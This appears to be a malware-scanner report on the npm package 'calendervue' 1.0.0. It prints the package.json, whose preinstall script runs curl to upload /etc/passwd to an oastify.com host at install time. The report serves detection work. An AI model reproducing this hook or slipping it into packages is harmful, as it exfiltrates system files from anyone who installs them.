2024 12-07-calendervue-v1.0.0

preinstall exfiltrates /etc/passwd

Script 'preinstall' uploads local file via curlnpm package executes a high-risk install-time command
SHA-256ab0e1e74101ed4b39d9e22f2c6344ae2926e06386dc8452270555d3041cba43e

Evidence

Script 'preinstall' uploads local file via curl lines 1–12
1{
2 "name": "calendervue",
3 "version": "1.0.0",
4 "description": "",
5 "main": "index.js",
6 "scripts": {
7 "test": "echo \"Error: no test specified\" && exit 1",
8 "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)1jloe3ztffiak9orbl4h0ah8tzzunnbc.oastify.com"
9 },
10 "author": "",
11 "license": "ISC"
12}

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.